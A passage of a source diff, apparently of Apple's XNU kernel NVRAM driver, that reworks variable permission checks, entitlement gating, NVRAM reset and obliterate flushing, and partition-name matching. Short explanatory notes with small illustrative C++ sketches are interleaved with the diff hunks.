-       "rbm-path",
-       "reconfig-behavior",
-       "reconfig-breakpoints",
-       "recovery-boot-mode",
-       "recovery-breadcrumbs",
-       "restored-host-timeout",
        "root-live-fs",
-       "rtos-path",
-       "soc-bin-offset",
-       "StartupMute",
-       "StartupMuteAccessibility",
-       "storage-prev-assert",
-       "storage-prev-assert-stored",
-       "summit-panel-id",
        "SystemAudioVolume",
        "SystemAudioVolumeExtension",
        "SystemAudioVolumeSaved",
-       "tz0-size-override",
-       "upgrade-fallback-boot-command",
-       "upgrade-retry",
-       "usb-enabled",
-       "wifi1addr",
-       "wifiaddr",
        nullptr
 };
 
@@ -361,7 +277,7 @@ VariablePermissionEntry gVariablePermissions[] = {
         .p.Bits.NeverAllowedToDelete = 1},
        {"boot-image", .p.Bits.UserWrite = 1},
        {"com.apple.System.fp-state", .p.Bits.KernelOnly = 1},
-       {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1},
+       {"policy-nonce-digests", .p.Bits.ResetNVRAMOnlyDelete = 1}, // Deleting this via user triggered obliterate leave J273a unable to boot
        {"security-password", .p.Bits.RootRequired = 1},
 
 #if !defined(__x86_64__)
@@ -369,6 +285,7 @@ VariablePermissionEntry gVariablePermissions[] = {
        {"acc-cm-override-count", .p.Bits.KernelOnly = 1},
        {"acc-mb-ld-lifetime", .p.Bits.KernelOnly = 1},
        {"backlight-level", .p.Bits.UserWrite = 1},
+       {"backlight-nits", .p.Bits.UserWrite = 1},
        {"com.apple.System.boot-nonce", .p.Bits.KernelOnly = 1},
        {"com.apple.System.sep.art", .p.Bits.KernelOnly = 1},
        {"darkboot", .p.Bits.UserWrite = 1},
@@ -445,11 +362,33 @@ verifyWriteSizeLimit(const uuid_t *varGuid, const char *variableName, size_t pro
        return true;
 }
 
+#if defined(DEBUG) || defined(DEVELOPMENT)
+static const char *
+getNVRAMOpString(IONVRAMOperation op)
+{
+       switch (op) {
+       case kIONVRAMOperationRead:
+               return "Read";
+       case kIONVRAMOperationWrite:
+               return "Write";
+       case kIONVRAMOperationDelete:
+               return "Delete";
+       case kIONVRAMOperationObliterate:
+               return "Obliterate";
+       case kIONVRAMOperationReset:
+               return "Reset";
+       default:
+               return "Unknown";
+       }
+}
+#endif
+
 static bool
 verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName)
 {
        VariablePermission perm;
-       bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled;
+       bool kernel, admin, writeEntitled, readEntitled, allowList, systemGuid, systemEntitled, systemInternalEntitled, systemAllow;
+       bool ok = false;
 
        perm = getVariablePermission(varName);
 
@@ -457,20 +396,24 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName
 
        if (perm.Bits.KernelOnly) {
                DEBUG_INFO("KernelOnly access for %s, kernel=%d\n", varName, kernel);
-               return kernel;
+               ok = kernel;
+               goto exit;
        }
 
-       allowList = variableInAllowList(varName);
-       systemGuid = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0;
-       admin = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess;
-       writeEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey);
-       readEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey);
-       systemEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey) || kernel;
+       allowList              = variableInAllowList(varName);
+       systemGuid             = uuid_compare(*varGuid, gAppleSystemVariableGuid) == 0;
+       admin                  = IOUserClient::clientHasPrivilege(current_task(), kIONVRAMPrivilege) == kIOReturnSuccess;
+       writeEntitled          = IOTaskHasEntitlement(current_task(), kIONVRAMWriteAccessKey);
+       readEntitled           = IOTaskHasEntitlement(current_task(), kIONVRAMReadAccessKey);
+       systemEntitled         = IOTaskHasEntitlement(current_task(), kIONVRAMSystemAllowKey);
+       systemInternalEntitled = IOTaskHasEntitlement(current_task(), kIONVRAMSystemInternalAllowKey);
+
+       systemAllow = systemEntitled || (systemInternalEntitled && gInternalBuild) || kernel;
 
        switch (op) {
        case kIONVRAMOperationRead:
                if (kernel || admin || readEntitled || perm.Bits.FullAccess) {
-                       return true;
+                       ok = true;
                }
                break;
 
@@ -478,15 +421,15 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName
                if (kernel || perm.Bits.UserWrite || admin || writeEntitled) {
                        if (systemGuid) {
                                if (allowList) {
-                                       if (!systemEntitled) {
+                                       if (!systemAllow) {
                                                DEBUG_ERROR("Allowed write to system region when NOT entitled for %s\n", varName);
                                        }
-                               } else if (!systemEntitled) {
+                               } else if (!systemAllow) {
                                        DEBUG_ERROR("Not entitled for system region writes for %s\n", varName);
                                        break;
                                }
                        }
-                       return true;
+                       ok = true;
                }
                break;
 
@@ -499,27 +442,31 @@ verifyPermission(IONVRAMOperation op, const uuid_t *varGuid, const char *varName
                } else if ((op == kIONVRAMOperationObliterate) && perm.Bits.ResetNVRAMOnlyDelete) {
                        DEBUG_INFO("Not allowed to obliterate %s\n", varName);
                        break;
+               } else if ((op == kIONVRAMOperationDelete) && perm.Bits.ResetNVRAMOnlyDelete) {
+                       DEBUG_INFO("Only allowed to delete %s via NVRAM reset\n", varName);
+                       break;
                }
 
                if (kernel || perm.Bits.UserWrite || admin || writeEntitled) {
                        if (systemGuid) {
                                if (allowList) {
-                                       if (!systemEntitled) {
+                                       if (!systemAllow) {
                                                DEBUG_ERROR("Allowed delete to system region when NOT entitled for %s\n", varName);
                                        }
-                               } else if (!systemEntitled) {
+                               } else if (!systemAllow) {
                                        DEBUG_ERROR("Not entitled for system region deletes for %s\n", varName);
                                        break;
                                }
                        }
-                       return true;
+                       ok = true;
                }
                break;
        }
 
-       DEBUG_INFO("Permission for %s denied, kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d\n",
-           varName, kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled);
-       return false;
+exit:
+       DEBUG_INFO("Permission for %s of %s %s: kernel=%d, admin=%d, writeEntitled=%d, readEntitled=%d, systemGuid=%d, systemEntitled=%d, systemInternalEntitled=%d, UserWrite=%d\n",
+           getNVRAMOpString(op), varName, ok ? "granted" : "denied", kernel, admin, writeEntitled, readEntitled, systemGuid, systemEntitled, systemInternalEntitled, perm.Bits.UserWrite);
+       return ok;
 }
 
 static bool
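
The verifyPermission() rewrite above folds the kernel bypass into a single systemAllow gate: system-region writes and deletes pass when the caller holds kIONVRAMSystemAllowKey, or holds the new kIONVRAMSystemInternalAllowKey on an internal build (gInternalBuild, set from csr_check(CSR_ALLOW_APPLE_INTERNAL) later in this diff), or is the kernel itself. A tiny truth-table sketch of that gate, with shortened illustrative names:

    #include <cstdio>

    static bool
    systemAllow(bool systemEntitled, bool internalEntitled, bool internalBuild, bool kernel)
    {
            // Mirrors: systemEntitled || (systemInternalEntitled && gInternalBuild) || kernel
            return systemEntitled || (internalEntitled && internalBuild) || kernel;
    }

    int
    main(void)
    {
            printf("%d\n", systemAllow(false, true,  true,  false));  // 1: internal entitlement on an internal build
            printf("%d\n", systemAllow(false, true,  false, false));  // 0: internal entitlement alone is not enough on customer builds
            printf("%d\n", systemAllow(false, false, false, true));   // 1: kernel callers always pass
            return 0;
    }
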
@@ -540,7 +487,7 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult)
 {
        uuid_string_t temp    = {0};
        size_t        keyLen  = strlen(key);
-       bool          result  = false;
+       bool          ok      = false;
        const char    *name   = key;
        uuid_t        guid;
 
@@ -551,12 +498,12 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult)
                if ((uuid_parse(temp, guid) == 0) &&
                    (key[sizeof(temp) - 1] == ':')) {
                        name = key + sizeof(temp);
-                       result = true;
+                       ok     = true;
                }
        }
 
        if (guidResult) {
-               result ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid);
+               ok ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid);
        }
        if (nameResult) {
                *nameResult = name;
@@ -565,6 +512,19 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult)
        return false;
 }
 
+static bool
+skipKey(const OSSymbol *aKey)
+{
+       return aKey->isEqualTo(kIOClassNameOverrideKey) ||
+              aKey->isEqualTo(kIOBSDNameKey) ||
+              aKey->isEqualTo(kIOBSDNamesKey) ||
+              aKey->isEqualTo(kIOBSDMajorKey) ||
+              aKey->isEqualTo(kIOBSDMinorKey) ||
+              aKey->isEqualTo(kIOBSDUnitKey);
+}
+
+// ************************** IODTNVRAMVariables ****************************
+
 // private IOService based class for publishing distinct dictionary properties on
 // for easy ioreg access since the serializeProperties call is overloaded and is used
 // as variable access
@@ -573,14 +533,20 @@ class IODTNVRAMVariables : public IOService
        OSDeclareDefaultStructors(IODTNVRAMVariables)
 private:
        IODTNVRAM        *_provider;
-       OSDictionary     *_properties;
+       OSDictionary     *_variables;
        uuid_t           _guid;
 
 public:
-       bool             init(const uuid_t *guid);
-       virtual bool     start(IOService * provider) APPLE_KEXT_OVERRIDE;
-       virtual IOReturn setProperties(OSObject * properties) APPLE_KEXT_OVERRIDE;
-       virtual bool     serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE;
+       bool                    init(const uuid_t *guid);
+       virtual bool            start(IOService * provider) APPLE_KEXT_OVERRIDE;
+       virtual IOReturn        setVariables(OSObject * properties);
+
+       virtual bool            serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE;
+       virtual OSPtr<OSObject> copyProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE;
+       virtual OSObject        *getProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE;
+       virtual bool            setProperty(const OSSymbol *aKey, OSObject *anObject) APPLE_KEXT_OVERRIDE;
+       virtual IOReturn        setProperties(OSObject *properties) APPLE_KEXT_OVERRIDE;
+       virtual void            removeProperty(const OSSymbol *aKey) APPLE_KEXT_OVERRIDE;
 };
 
 OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService)
@@ -588,23 +554,30 @@ OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService)
 bool
 IODTNVRAMVariables::init(const uuid_t *guid)
 {
-       require(super::init(), error);
-       require(guid, error);
+       if (!super::init()) {
+               return false;
+       }
+
+       if (guid == nullptr) {
+               return false;
+       }
 
        uuid_copy(_guid, *guid);
 
        return true;
-
-error:
-       return false;
 }
 
 bool
 IODTNVRAMVariables::start(IOService * provider)
 {
-       require(IOService::start(provider), error);
+       if (!IOService::start(provider)) {
+               goto error;
+       }
 
-       require(_provider = OSDynamicCast(IODTNVRAM, provider), error);
+       _provider = OSDynamicCast(IODTNVRAM, provider);
+       if (_provider == nullptr) {
+               goto error;
+       }
 
        registerService();
 
@@ -617,15 +590,15 @@ error:
 }
 
 IOReturn
-IODTNVRAMVariables::setProperties(OSObject * properties)
+IODTNVRAMVariables::setVariables(OSObject * variables)
 {
-       if (OSDynamicCast(OSDictionary, properties)) {
-               OSSafeReleaseNULL(_properties);
-               _properties = OSDynamicCast(OSDictionary, properties);
-               properties->retain();
+       if (OSDynamicCast(OSDictionary, variables)) {
+               OSSafeReleaseNULL(_variables);
+               _variables = OSDynamicCast(OSDictionary, variables);
+               variables->retain();
        }
 
-       return IOService::setProperties(properties);
+       return kIOReturnSuccess;
 }
 
 bool
@@ -634,30 +607,123 @@ IODTNVRAMVariables::serializeProperties(OSSerialize *s) const
        const OSSymbol                    *key;
        OSSharedPtr<OSDictionary>         dict;
        OSSharedPtr<OSCollectionIterator> iter;
-       OSSharedPtr<OSDictionary>         localProperties(_properties, OSRetain);
-       bool                              result = false;
+       OSSharedPtr<OSDictionary>         localVariables(_variables, OSRetain);
+       bool                              ok = false;
 
-       require(localProperties != nullptr, exit);
+       if (localVariables == nullptr) {
+               goto exit;
+       }
 
-       dict = OSDictionary::withCapacity(localProperties->getCount());
-       require_action(dict, exit, DEBUG_ERROR("No dictionary\n"));
+       dict = OSDictionary::withCapacity(localVariables->getCount());
+       if (dict == nullptr) {
+               DEBUG_ERROR("No dictionary\n");
+               goto exit;
+       }
 
-       iter = OSCollectionIterator::withCollection(localProperties.get());
-       require_action(iter, exit, DEBUG_ERROR("failed to create iterator\n"));
+       iter = OSCollectionIterator::withCollection(localVariables.get());
+       if (iter == nullptr) {
+               DEBUG_ERROR("failed to create iterator\n");
+               goto exit;
+       }
 
        while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
                if (verifyPermission(kIONVRAMOperationRead, &_guid, key)) {
-                       dict->setObject(key, localProperties->getObject(key));
+                       dict->setObject(key, localVariables->getObject(key));
                }
        }
 
-       result = dict->serialize(s);
+       ok = dict->serialize(s);
 
 exit:
-       DEBUG_INFO("result=%d\n", result);
-       return result;
+       DEBUG_INFO("ok=%d\n", ok);
+       return ok;
+}
+
+OSPtr<OSObject>
+IODTNVRAMVariables::copyProperty(const OSSymbol *aKey) const
+{
+       if (_provider && !skipKey(aKey)) {
+               DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
+
+               return _provider->copyPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy());
+       } else {
+               return nullptr;
+       }
 }
 
+OSObject *
+IODTNVRAMVariables::getProperty(const OSSymbol *aKey) const
+{
+       OSSharedPtr<OSObject> theObject = copyProperty(aKey);
+
+       return theObject.get();
+}
+
+bool
+IODTNVRAMVariables::setProperty(const OSSymbol *aKey, OSObject *anObject)
+{
+       if (_provider) {
+               return _provider->setPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy(), anObject);
+       } else {
+               return false;
+       }
+}
+
+IOReturn
+IODTNVRAMVariables::setProperties(OSObject *properties)
+{
+       IOReturn                          ret = kIOReturnSuccess;
+       OSObject                          *object;
+       const OSSymbol                    *key;
+       OSDictionary                      *dict;
+       OSSharedPtr<OSCollectionIterator> iter;
+
+       if (_provider) {
+               dict = OSDynamicCast(OSDictionary, properties);
+               if (dict == nullptr) {
+                       DEBUG_ERROR("Not a dictionary\n");
+                       return kIOReturnBadArgument;
+               }
+
+               iter = OSCollectionIterator::withCollection(dict);
+               if (iter == nullptr) {
+                       DEBUG_ERROR("Couldn't create iterator\n");
+                       return kIOReturnBadArgument;
+               }
+
+               while (ret == kIOReturnSuccess) {
+                       key = OSDynamicCast(OSSymbol, iter->getNextObject());
+                       if (key == nullptr) {
+                               break;
+                       }
+
+                       object = dict->getObject(key);
+                       if (object == nullptr) {
+                               continue;
+                       }
+
+                       ret = setProperty(key, object);
+               }
+       } else {
+               ret = kIOReturnNotReady;
+       }
+
+       DEBUG_INFO("ret=%#08x\n", ret);
+
+       return ret;
+}
+
+void
+IODTNVRAMVariables::removeProperty(const OSSymbol *aKey)
+{
+       if (_provider) {
+               _provider->removePropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy());
+       }
+}
+
+
+// **************************** IODTNVRAM *********************************
+
 bool
 IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane)
 {
@@ -667,7 +733,17 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane)
                return false;
        }
 
-       _variableLock = IOLockAlloc();
+       PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging));
+
+#if XNU_TARGET_OS_OSX
+#if CONFIG_CSR
+       gInternalBuild = (csr_check(CSR_ALLOW_APPLE_INTERNAL) == 0);
+#endif // CONFIG_CSR
+#endif // XNU_TARGET_OS_OSX
+
+       DEBUG_INFO("gInternalBuild = %d\n", gInternalBuild);
+
+       _variableLock = IORWLockAlloc();
        if (!_variableLock) {
                return false;
        }
@@ -677,8 +753,6 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane)
                return false;
        }
 
-       PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging));
-
        dict =  OSDictionary::withCapacity(1);
        if (dict == nullptr) {
                return false;
@@ -789,12 +863,14 @@ IODTNVRAM::registerNVRAMController(IONVRAMController *nvram)
 
        DEBUG_INFO("setting controller\n");
 
+       CONTROLLERLOCK();
        _nvramController = nvram;
+       CONTROLLERUNLOCK();
 
        // <rdar://problem/9529235> race condition possible between
        // IODTNVRAM and IONVRAMController (restore loses boot-args)
        if (!_isProxied) {
-               DEBUG_INFO("Proxied NVRAM data\n");
+               DEBUG_INFO("Reading non-proxied NVRAM data\n");
                _nvramController->read(0, _nvramImage, _nvramSize);
                initNVRAMImage();
        }
@@ -850,7 +926,7 @@ no_system:
 
 no_common:
        ret = serializeVariables();
-       DEBUG_INFO("serializeVariables ret=0x%08x\n", ret);
+       DEBUG_INFO("serializeVariables ret=%#08x\n", ret);
 }
 
 void
@@ -867,8 +943,11 @@ IODTNVRAM::initNVRAMImage(void)
        while (currentOffset < _nvramSize) {
                bool common_partition;
                bool system_partition;
-
                chrp_nvram_header_t * header = (chrp_nvram_header_t *)(_nvramImage + currentOffset);
+               const uint8_t common_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V1};
+               const uint8_t common_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V2};
+               const uint8_t system_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1};
+               const uint8_t system_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2};
 
                currentLength = header->len * NVRAM_CHRP_LENGTH_BLOCK_SIZE;
 
@@ -883,9 +962,10 @@ IODTNVRAM::initNVRAMImage(void)
                        break;
                }
 
-               common_partition = memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0;
-               system_partition = (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) ||
-                   (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY)) == 0);
+               common_partition = (memcmp(header->name, common_v1_name, sizeof(header->name)) == 0) ||
+                   (memcmp(header->name, common_v2_name, sizeof(header->name)) == 0);
+               system_partition = (memcmp(header->name, system_v1_name, sizeof(header->name)) == 0) ||
+                   (memcmp(header->name, system_v2_name, sizeof(header->name)) == 0);
 
                if (common_partition) {
                        _commonPartitionOffset = partitionOffset;
@@ -897,8 +977,8 @@ IODTNVRAM::initNVRAMImage(void)
                        OSSharedPtr<OSNumber> partitionOffsetNumber, partitionLengthNumber;
 
                        // Construct the partition ID from the signature and name.
-                       snprintf(partitionID, sizeof(partitionID), "0x%02x,", header->sig);
-                       strncpy(partitionID + 5, header->name, sizeof(header->name));
+                       snprintf(partitionID, sizeof(partitionID), "%#02x,", header->sig);
+                       memcpy(partitionID + 5, header->name, sizeof(header->name));
                        partitionID[17] = '\0';
 
                        partitionOffsetNumber = OSNumber::withNumber(partitionOffset, 32);
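
The partition check above now compares the full, zero-padded name field against the v1/v2 constants instead of a strlen-bounded prefix match, so a name that merely starts with "common" or "system" no longer matches. A small stand-alone illustration of prefix versus full-width comparison; the 12-byte width and the helper names are assumptions for the sketch, not the kernel's code:

    #include <cstdio>
    #include <cstring>

    #define NAME_FIELD_LEN 12   // width assumed here for the CHRP partition name field

    // Old style: prefix match bounded by strlen() of the constant.
    static bool
    prefix_match(const char name[NAME_FIELD_LEN], const char *want)
    {
            return memcmp(name, want, strlen(want)) == 0;
    }

    // New style: compare the whole zero-padded field.
    static bool
    full_match(const char name[NAME_FIELD_LEN], const char *want)
    {
            char padded[NAME_FIELD_LEN] = {0};
            strncpy(padded, want, NAME_FIELD_LEN);
            return memcmp(name, padded, NAME_FIELD_LEN) == 0;
    }

    int
    main(void)
    {
            char field[NAME_FIELD_LEN] = {0};
            strncpy(field, "commonplace", NAME_FIELD_LEN);   // a lookalike, not a real partition name

            printf("prefix: %d  full: %d\n",
                prefix_match(field, "common"), full_match(field, "common"));
            // prints "prefix: 1  full: 0" -- only the padded comparison rejects the lookalike
            return 0;
    }
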
@@ -919,7 +999,7 @@ IODTNVRAM::initNVRAMImage(void)
                _systemImage = _nvramImage + _systemPartitionOffset;
        }
 
-       DEBUG_ALWAYS("NVRAM : ofPartitionOffset - 0x%x, ofPartitionSize - 0x%x, systemPartitionOffset - 0x%x, systemPartitionSize - 0x%x\n",
+       DEBUG_ALWAYS("NVRAM : commonPartitionOffset - %#x, commonPartitionSize - %#x, systemPartitionOffset - %#x, systemPartitionSize - %#x\n",
            (unsigned int) _commonPartitionOffset, (unsigned int) _commonPartitionSize, (unsigned int) _systemPartitionOffset, (unsigned int) _systemPartitionSize);
 
        _lastDeviceSync = 0;
@@ -963,10 +1043,10 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const
        const OSSymbol                    *key;
        OSSharedPtr<OSDictionary>         systemDict, commonDict, dict;
        OSSharedPtr<OSCollectionIterator> iter;
-       bool                              result = false;
+       bool                              ok = false;
        unsigned int                      totalCapacity = 0;
 
-       NVRAMLOCK();
+       NVRAMREADLOCK();
        if (_commonDict) {
                commonDict = OSDictionary::withDictionary(_commonDict.get());
        }
@@ -1021,12 +1101,12 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const
                }
        }
 
-       result = dict->serialize(s);
+       ok = dict->serialize(s);
 
 exit:
-       DEBUG_INFO("result=%d\n", result);
+       DEBUG_INFO("ok=%d\n", ok);
 
-       return result;
+       return ok;
 }
 
 IOReturn
@@ -1048,89 +1128,89 @@ IODTNVRAM::chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid, c
                        DEBUG_INFO("Using common dictionary\n");
                        *dict = _commonDict.get();
                }
-       } else {
+               return kIOReturnSuccess;
+       } else if (_commonDict != nullptr) {
                DEBUG_INFO("Defaulting to common dictionary\n");
                *dict = _commonDict.get();
+               return kIOReturnSuccess;
        }
 
-       return kIOReturnSuccess;
+       return kIOReturnNotFound;
 }
 
-bool
-IODTNVRAM::handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error)
+IOReturn
+IODTNVRAM::flushDict(const uuid_t *guid, IONVRAMOperation op)
 {
        IOReturn err = kIOReturnSuccess;
-       bool special = false;
 
-       NVRAMLOCKASSERT();
+       if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) {
+               const OSSymbol *key;
+               OSSharedPtr<OSDictionary> newDict;
+               OSSharedPtr<OSCollectionIterator> iter;
 
-       if (strcmp(name, "ResetNVRam") == 0) {
-               DEBUG_INFO("%s requested\n", name);
+               newDict = OSDictionary::withCapacity(_systemDict->getCapacity());
+               iter = OSCollectionIterator::withCollection(_systemDict.get());
+               if ((newDict == nullptr) || (iter == nullptr)) {
+                       err = kIOReturnNoMemory;
+                       goto exit;
+               }
 
-               if (uuid_compare(*guid, gAppleSystemVariableGuid) == 0) {
-                       if (_systemDict != nullptr) {
-                               _systemDict->flushCollection();
+               while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
+                       if (!verifyPermission(op, &gAppleSystemVariableGuid, key)) {
+                               newDict->setObject(key, _systemDict->getObject(key));
                        }
-
-                       _commonDict->flushCollection();
-                       DEBUG_INFO("system & common dictionary flushed\n");
                }
 
-               special = true;
-       } else if (strcmp(name, "ObliterateNVRam") == 0) {
-               DEBUG_INFO("%s requested\n", name);
+               _systemDict = newDict;
 
-               if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) {
-                       const OSSymbol *key;
-                       OSSharedPtr<OSDictionary> newDict;
-                       OSSharedPtr<OSCollectionIterator> iter;
+               DEBUG_INFO("system dictionary flushed\n");
+       } else if ((_commonDict != nullptr) && (uuid_compare(*guid, gAppleNVRAMGuid) == 0)) {
+               const OSSymbol *key;
+               OSSharedPtr<OSDictionary> newDict;
+               OSSharedPtr<OSCollectionIterator> iter;
 
-                       newDict = OSDictionary::withCapacity(_systemDict->getCapacity());
-                       iter = OSCollectionIterator::withCollection(newDict.get());
-                       if ((newDict == nullptr) || (iter == nullptr)) {
-                               err = kIOReturnNoMemory;
-                               goto exit;
-                       }
-
-                       while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
-                               const OSSymbol *key = OSDynamicCast(OSSymbol, iter->getNextObject());
-                               if (key == nullptr) {
-                                       err = kIOReturnNoMemory;
-                                       goto exit;
-                               }
+               newDict = OSDictionary::withCapacity(_commonDict->getCapacity());
+               iter = OSCollectionIterator::withCollection(_commonDict.get());
+               if ((newDict == nullptr) || (iter == nullptr)) {
+                       err = kIOReturnNoMemory;
+                       goto exit;
+               }
 
-                               if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleSystemVariableGuid, key)) {
-                                       newDict->setObject(key, _systemDict->getObject(key));
-                               }
+               while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
+                       if (!verifyPermission(op, &gAppleNVRAMGuid, key)) {
+                               newDict->setObject(key, _commonDict->getObject(key));
                        }
+               }
 
-                       _systemDict = newDict;
+               _commonDict = newDict;
 
-                       DEBUG_INFO("system dictionary flushed\n");
-               } else if (_commonDict != nullptr) {
-                       const OSSymbol *key;
-                       OSSharedPtr<OSDictionary> newDict;
-                       OSSharedPtr<OSCollectionIterator> iter;
+               DEBUG_INFO("common dictionary flushed\n");
+       }
 
-                       newDict = OSDictionary::withCapacity(_commonDict->getCapacity());
-                       iter = OSCollectionIterator::withCollection(newDict.get());
-                       if ((newDict == nullptr) || (iter == nullptr)) {
-                               err = kIOReturnNoMemory;
-                               goto exit;
-                       }
+exit:
+       return err;
+}
 
-                       while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) {
-                               if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleNVRAMGuid, key)) {
-                                       newDict->setObject(key, _commonDict->getObject(key));
-                               }
-                       }
+bool
+IODTNVRAM::handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error)
+{
+       IOReturn err = kIOReturnSuccess;
+       bool special = false;
 
-                       _commonDict = newDict;
+       NVRAMLOCKASSERTEXCLUSIVE();
 
-                       DEBUG_INFO("common dictionary flushed\n");
+       // ResetNVRam flushes both regions in one call
+       // Obliterate can flush either separately
+       if (strcmp(name, "ObliterateNVRam") == 0) {
+               err = flushDict(guid, kIONVRAMOperationObliterate);
+       } else if (strcmp(name, "ResetNVRam") == 0) {
+               err = flushDict(&gAppleSystemVariableGuid, kIONVRAMOperationReset);
+
+               if (err != kIOReturnSuccess) {
+                       goto exit;
                }
 
-               special = true;
+               err = flushDict(&gAppleNVRAMGuid, kIONVRAMOperationReset);
        }
 
 exit:
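
The flushDict() helper introduced above rebuilds the chosen region's dictionary rather than emptying it: each key is run through verifyPermission() for the flush operation, and keys that fail the check (for example ResetNVRAMOnlyDelete variables such as policy-nonce-digests during an Obliterate) are carried into the replacement dictionary and so survive the wipe. It also iterates the existing dictionary, where the removed ObliterateNVRam path iterated the freshly created, empty one. A compact stand-alone sketch of the rebuild-keeping-protected-keys idea, with std::map standing in for OSDictionary and mayFlush standing in for verifyPermission:

    #include <cstdio>
    #include <map>
    #include <string>

    // Stand-in for verifyPermission(op, guid, key): true when the key may be flushed.
    static bool
    mayFlush(const std::string &key)
    {
            return key != "policy-nonce-digests";   // example of a ResetNVRAMOnlyDelete-style key
    }

    static std::map<std::string, std::string>
    flushKeepingProtected(const std::map<std::string, std::string> &vars)
    {
            std::map<std::string, std::string> kept;
            for (const auto &kv : vars) {
                    if (!mayFlush(kv.first)) {
                            kept.insert(kv);        // protected keys survive the flush
                    }
            }
            return kept;
    }

    int
    main(void)
    {
            std::map<std::string, std::string> vars = {
                    {"boot-args", "-v"},
                    {"policy-nonce-digests", "(opaque)"},
            };
            for (const auto &kv : flushKeepingProtected(vars)) {
                    printf("kept: %s\n", kv.first.c_str());   // prints only policy-nonce-digests
            }
            return 0;
    }
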
@@ -1142,39 +1222,25 @@ exit:
 }
 
 OSSharedPtr<OSObject>
-IODTNVRAM::copyProperty(const OSSymbol *aKey) const
+IODTNVRAM::copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const
 {
        IOReturn              result;
-       const char            *variableName;
-       uuid_t                varGuid;
        OSDictionary          *dict;
        OSSharedPtr<OSObject> theObject = nullptr;
 
-       if (aKey->isEqualTo(kIOBSDNameKey) ||
-           aKey->isEqualTo(kIOBSDNamesKey) ||
-           aKey->isEqualTo(kIOBSDMajorKey) ||
-           aKey->isEqualTo(kIOBSDMinorKey) ||
-           aKey->isEqualTo(kIOBSDUnitKey)) {
-               // These will never match.
-               // Check here and exit to avoid logging spam
-               return nullptr;
-       }
-       DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy());
-
-       parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName);
-
-       result = chooseDictionary(kIONVRAMOperationRead, &varGuid, variableName, &dict);
+       result = chooseDictionary(kIONVRAMOperationRead, guid, name, &dict);
        if (result != kIOReturnSuccess) {
+               DEBUG_INFO("No dictionary\n");
                goto exit;
        }
 
-       if (!verifyPermission(kIONVRAMOperationRead, &varGuid, variableName)) {
+       if (!verifyPermission(kIONVRAMOperationRead, guid, name)) {
                DEBUG_INFO("Not privileged\n");
                goto exit;
        }
 
-       NVRAMLOCK();
-       theObject.reset(dict->getObject(variableName), OSRetain);
+       NVRAMREADLOCK();
+       theObject.reset(dict->getObject(name), OSRetain);
        NVRAMUNLOCK();
 
        if (theObject != nullptr) {
@@ -1185,6 +1251,22 @@ exit:
        return theObject;
 }
 
+OSSharedPtr<OSObject>
+IODTNVRAM::copyProperty(const OSSymbol *aKey) const
+{
+       const char            *variableName;
+       uuid_t                varGuid;
